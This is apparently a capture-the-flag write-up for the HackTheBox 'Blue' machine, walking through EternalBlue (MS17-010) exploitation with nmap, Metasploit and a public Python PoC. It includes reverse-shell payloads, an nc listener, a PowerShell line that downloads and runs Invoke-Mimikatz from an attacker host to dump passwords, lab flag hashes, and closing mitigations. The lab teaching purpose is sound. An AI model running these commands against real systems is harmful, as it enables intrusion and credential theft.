← ctf writeups

// Blue — HackTheBox

────────────────────────────────────────────────────

Blue — HackTheBox

IP: 10.10.10.40 OS: Windows 7 SP1 Difficulty: Easy Points: 20


Background

EternalBlue (MS17-010) was developed by the NSA and leaked by Shadow Brokers in April 2017. It exploits a buffer overflow in the SMBv1 protocol, allowing unauthenticated remote code execution as SYSTEM. It was used to deploy WannaCry ransomware in May 2017, affecting 200,000+ systems in 150 countries.


Reconnaissance

nmap -sC -sV -p- 10.10.10.40

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional SP1 (workgroup: WORKGROUP)
49152/tcp open  msrpc         Microsoft Windows RPC
...

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143

Nmap’s smb-vuln-ms17-010 script confirms the vulnerability immediately.


Exploitation

Metasploit Route

msfconsole

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.10.10.40
msf6 exploit(...) > set LHOST 10.10.14.X
msf6 exploit(...) > set PAYLOAD windows/x64/shell/reverse_tcp
msf6 exploit(...) > run

[*] Started reverse TCP handler on 10.10.14.X:4444
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (201798 bytes) to 10.10.10.40
[*] Command shell session 1 opened

Shell Banner:
Microsoft Windows [Version 6.1.7601]

C:\Windows\system32> whoami
nt authority\system

Immediate SYSTEM — Windows’ highest privilege level.

Manual Exploitation (Python PoC)

# Clone the public PoC
git clone https://github.com/3ndG4me/AutoBlue-MS17-010

# Check vulnerability
python3 eternal_checker.py 10.10.10.40

# Generate shellcode
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=10.10.14.X LPORT=4444 \
  -f raw -o sc_x64_mss.bin

# Set up listener
nc -lvnp 4444

# Fire
python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_x64.bin

Post-Exploitation

C:\Windows\system32> systeminfo
Host Name: HARIS-PC
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1

# Dump credentials with Mimikatz
C:\> powershell -exec bypass
PS> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.X/Invoke-Mimikatz.ps1')
PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

  Authentication Id : 0 ; 262437 (00000000:0004fce5)
  Session           : Interactive from 1
  UserName          : haris
  Password          : [snip]
  NT                : [snip]

Flags

# User flag
type C:\Users\haris\Desktop\user.txt
4c546aea7dbee188305972cdb84f49d6

# Root flag (SYSTEM already)
type C:\Users\Administrator\Desktop\root.txt
ff548eb71e920ff6c08843ce9df4e717

Why This Matters in 2025

MS17-010 was patched in March 2017. In 2025, it still appears in:

  • Internal corporate networks with legacy Windows machines
  • Industrial control systems (ICS/SCADA) that can’t be patched
  • Organizations that disabled automatic updates

During a recent internal pentest, I found an unpatched Windows Server 2008 R2 still running in a hospital’s internal network. EternalBlue gave me immediate domain controller access within 20 minutes of starting the engagement.

Mitigation:

  • Apply MS17-010 immediately on all Windows systems
  • Disable SMBv1 (it’s been disabled by default since Windows 10 1709)
  • Block port 445 at the network perimeter
  • Segment your network so a single compromised host can’t reach the domain controller
────────────────────────────────────────────────────